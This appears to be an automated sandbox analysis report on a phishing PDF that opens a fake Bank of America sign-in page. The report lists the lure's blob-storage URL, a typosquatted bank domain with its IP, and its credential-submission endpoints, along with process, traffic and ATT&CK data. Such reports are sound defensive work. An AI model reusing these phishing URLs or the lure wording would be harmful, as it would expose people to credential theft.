Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59079
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59112
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59078
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59111
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59073
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59072
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59075
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59074
Source: unknownNetwork traffic detected: HTTP traffic on port 59105 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59071
Source: unknownNetwork traffic detected: HTTP traffic on port 59120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59070
Source: unknownNetwork traffic detected: HTTP traffic on port 59117 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59118
Source: unknownNetwork traffic detected: HTTP traffic on port 59077 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59117
Source: unknownNetwork traffic detected: HTTP traffic on port 59098 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59119
Source: unknownNetwork traffic detected: HTTP traffic on port 59090 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59088
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59087
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59089
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59084
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59083
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59086
Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59083 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59085
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59080
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59082
Source: unknownNetwork traffic detected: HTTP traffic on port 59102 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59081
Source: unknownNetwork traffic detected: HTTP traffic on port 59074 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59116 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59119 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59099
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59098
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59095
Source: unknownNetwork traffic detected: HTTP traffic on port 59103 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59080 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59097
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59096
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59091
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59090
Source: unknownNetwork traffic detected: HTTP traffic on port 59088 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59071 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59096 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59079 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59085 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59100 -> 443
Source: chromecache_194.14.drOLE indicator, VBA macros: true
Source: chromecache_194.14.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: classification engineClassification label: mal52.phis.winPDF@30/122@4/4
Source: 0430tely.pdfInitial sample: https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6308Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-15 13-41-21-511.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\0430tely.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1580,i,6253502165632248395,16397532995403406337,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1788,i,3425846688857665517,9014097320282314136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://confirmationonline.blob.core.windows.net/attestation/complete.html?1da72Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1580,i,6253502165632248395,16397532995403406337,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=1788,i,3425846688857665517,9014097320282314136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.13.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 0430tely.pdfInitial sample: PDF keyword /JS count = 0
Source: 0430tely.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: 0430tely.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
1
Spearphishing Link
Windows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
Logon Script (Windows)1
Deobfuscate/Decode Files or Information
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Application Layer Protocol
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1592118 Sample: 0430tely.pdf Startdate: 15/01/2025 Architecture: WINDOWS Score: 52 20 x1.i.lencr.org 2->20 22 www.google.com 2->22 24 3 other IPs or domains 2->24 34 AI detected phishing page 2->34 36 AI detected landing page (webpage, office document or email) 2->36 8 Acrobat.exe 20 76 2->8         started        signatures3 process4 process5 10 chrome.exe 8 8->10         started        13 AcroCEF.exe 108 8->13         started        dnsIp6 26 192.168.2.16, 138, 443, 53 unknown unknown 10->26 28 239.255.255.250 unknown Reserved 10->28 15 chrome.exe 10->15         started        18 AcroCEF.exe 4 13->18         started        process7 dnsIp8 30 www.google.com 142.250.184.196, 443, 59072 GOOGLEUS United States 15->30 32 online.access.secure.bankofamerlica.com 188.119.66.154, 443, 59066, 59067 FLYNETRU Russian Federation 15->32

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://online.access.secure.bankofamerlica.com/assets/gfoot-home-icon.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/favicon.ico0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/onetrust-style.css0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/special/css/loader.css0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/fsd-secure-esp-sprite.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/pill.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/cnx-regular.woff0%Avira URL Cloudsafe
http://docs.jquery.com/Plugins/Validation0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/error-large.gif0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/online-id-vipaa-module-enter-skin.js0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/BofA_rgb.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/submit.php0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/powered_by_logo.svg0%Avira URL Cloudsafe
http://www.reportlab.com)0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/?ref=9854tjwe460%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.js0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/BOA.PNG0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/special/js/main.js0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/sign-in-sprite.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/secure/secure.php0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd-hover.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr-print.css0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/gfootb-static-sprite.png0%Avira URL Cloudsafe
http://www.reportlab.com0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/mobile_llama.png0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.css0%Avira URL Cloudsafe
https://online.access.secure.bankofamerlica.com/favicon.ico0%Avira URL Cloudsafe
http://bassistance.de/jquery-plugins/jquery-plugin-validation/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    online.access.secure.bankofamerlica.com
    188.119.66.154
    truefalse
      high
      www.google.com
      142.250.184.196
      truefalse
        high
        241.42.69.40.in-addr.arpa
        unknown
        unknownfalse
          high
          x1.i.lencr.org
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://online.access.secure.bankofamerlica.com/assets/cnx-regular.wofffalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/favicon.icofalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/gfoot-home-icon.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/onetrust-style.cssfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/special/css/loader.cssfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/error-large.giffalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/fsd-secure-esp-sprite.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/pill.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/online-id-vipaa-module-enter-skin.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/BofA_rgb.pngfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/submit.phpfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/false
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/?ref=9854tjwe46false
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/assets/special/js/main.jsfalse
            • Avira URL Cloud: safe
            unknown
            https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.gotrue
              unknown
              https://online.access.secure.bankofamerlica.com/assets/powered_by_logo.svgfalse
              • Avira URL Cloud: safe
              unknown
              https://online.access.secure.bankofamerlica.com/secure/false
                unknown
                https://online.access.secure.bankofamerlica.com/assets/BOA.PNGfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/sign-in-sprite.pngfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/secure/secure.phpfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/help-qm-fsd-hover.pngfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr-print.cssfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/gfootb-static-sprite.pngfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/mobile_llama.pngfalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/favicon.icofalse
                • Avira URL Cloud: safe
                unknown
                https://online.access.secure.bankofamerlica.com/assets/vipaa-v4-jawr.cssfalse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://fls.doubleclick.net/activityichromecache_208.14.dr, chromecache_207.14.drfalse
                  high
                  http://jquery.org/licensechromecache_207.14.drfalse
                    high
                    https://github.com/ded/bowserchromecache_208.14.dr, chromecache_207.14.drfalse
                      high
                      https://secure.opinionlab.com/ccc01/comment_card_d.asp?chromecache_208.14.dr, chromecache_207.14.drfalse
                        high
                        http://jqueryui.comchromecache_207.14.drfalse
                          high
                          https://www.bankofamerica.com/homepage/language-not-available.go?target=https://www.bankofamerica.cochromecache_208.14.dr, chromecache_207.14.drfalse
                            high
                            https://secure.opinionlab.com/ccc01/comment_card_d.aspchromecache_208.14.dr, chromecache_207.14.drfalse
                              high
                              https://github.com/jquery/jquery-colorchromecache_208.14.dr, chromecache_207.14.drfalse
                                high
                                http://docs.jquery.com/Plugins/Validationchromecache_208.14.dr, chromecache_207.14.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.opensource.org/licenses/mit-license.phpchromecache_208.14.dr, chromecache_207.14.drfalse
                                  high
                                  https://npmcdn.com/jsencryptchromecache_208.14.dr, chromecache_207.14.drfalse
                                    high
                                    https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.aspchromecache_208.14.dr, chromecache_207.14.drfalse
                                      high
                                      http://www.reportlab.com)0430tely.pdffalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp?r=chromecache_208.14.dr, chromecache_207.14.drfalse
                                        high
                                        https://chrome.cloudflare-dns.comd52f2a14-5a7e-4fe8-9b3e-8660dd32ebfb.tmp.3.drfalse
                                          high
                                          http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                            high
                                            https://secure.opinionlab.com/ccc01/comment_card.asp?chromecache_208.14.dr, chromecache_207.14.drfalse
                                              high
                                              https://www.bankofamerica.com/mweb/index.html?app=signonchromecache_208.14.dr, chromecache_207.14.drfalse
                                                high
                                                http://api.jqueryui.com/position/chromecache_208.14.dr, chromecache_207.14.drfalse
                                                  high
                                                  https://www.bankofamerica.comchromecache_207.14.drfalse
                                                    high
                                                    http://www.reportlab.com0430tely.pdffalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://secure.opinionlab.comchromecache_207.14.drfalse
                                                      high
                                                      http://bassistance.de/jquery-plugins/jquery-plugin-validation/chromecache_208.14.dr, chromecache_207.14.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.184.196
                                                      www.google.comUnited States
                                                      15169GOOGLEUSfalse
                                                      239.255.255.250
                                                      unknownReserved
                                                      unknownunknownfalse
                                                      188.119.66.154
                                                      online.access.secure.bankofamerlica.comRussian Federation
                                                      209499FLYNETRUfalse
                                                      IP
                                                      192.168.2.16
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1592118
                                                      Start date and time:2025-01-15 19:40:50 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 3m 39s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:18
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:0430tely.pdf
                                                      renamed because original name is a hash value
                                                      Original Sample Name:Unauthrizd Sign-ln Dtectd - nfirm unt Infrmtin Immditely.pdf
                                                      Detection:MAL
                                                      Classification:mal52.phis.winPDF@30/122@4/4
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .pdf
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 199.232.210.172, 2.23.240.205, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 162.159.61.3, 172.64.41.3, 2.23.197.184, 172.217.18.3, 142.250.186.110, 64.233.184.84, 57.150.87.129, 2.16.168.100, 2.16.168.103, 2.16.168.125, 2.16.168.107, 172.217.16.206, 142.250.185.234, 142.250.186.42, 142.250.184.234, 172.217.18.10, 142.250.185.106, 142.250.186.138, 142.250.185.74, 142.250.185.138, 142.250.185.202, 216.58.212.138, 142.250.186.74, 142.250.186.170, 172.217.16.202, 172.217.18.106, 216.58.206.74, 142.250.185.170, 142.250.185.238, 142.250.181.234, 142.250.184.202, 216.58.206.42, 142.250.186.106, 216.58.206.78, 2.19.106.160, 20.109.210.53, 40.69.42.241, 23.217.172.185, 172.202.163.200
                                                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, redirector.gvt1.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, confirmationonline.blob.core.windows.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, windows.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, armmf.adobe.com, blob.iad11prdstr04a.store.core.windows.net, clients.l.google.com, geo2.adobe.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      TimeTypeDescription
                                                      13:41:47API Interceptor3x Sleep call for process: AcroCEF.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      239.255.255.250oD2XngYscZ.ps1Get hashmaliciousUnknownBrowse
